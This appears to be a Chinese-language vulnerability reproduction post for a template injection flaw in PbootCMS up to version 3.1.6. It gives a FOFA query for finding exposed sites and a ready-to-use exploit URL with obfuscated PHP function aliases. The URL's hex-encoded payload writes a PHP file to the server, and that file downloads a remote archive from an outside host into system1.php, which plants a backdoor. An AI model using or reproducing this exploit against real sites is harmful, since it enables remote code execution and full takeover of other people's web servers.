PbootCMS是全新内核且永久开源免费的PHP企业网站开发建设管理系统,是一套高效、简洁、 强悍的可免费商用的PHP CMS源码,能够满足各类企业网站开发建设的需要。
漏洞概述
PbootCMS v<=3.1.6版本中存在模板注入,攻击者可构造特定的链接利用该漏洞,执行任意代码,写入后门,获取服务器权限,进而控制整个web服务器。
复现环境
FOFA:app="PbootCMS-PHP网站开发管理系统"
漏洞复现
PoC-1
/?member/login/klmns}{pboot:if(1);use/**/function/**/fputs/**/as/**/test;use/**/function/**/fopen/**/as/**/klmj0;use/**/function/**/get/**/as/**/klmj99;use/**/function/**/hex2bin/**/as/**/klmj66;test(klmj0(klmj99(‘ll‘),‘w‘),klmj66(klmj99(‘txt‘)));if(2)}{/pboot:if}&amp;ll=.xsZml.php&amp;txt=3C3F7068700A2461203D2022636F7079223B0A24612822687474703A2F2F7777772E677A2D6C7879792E636F6D2F7374617469632F6164646F6E732F6769742E7A6970222C2273797374656D312E70687022293B0A6563686F20276F6B313233273B
THE END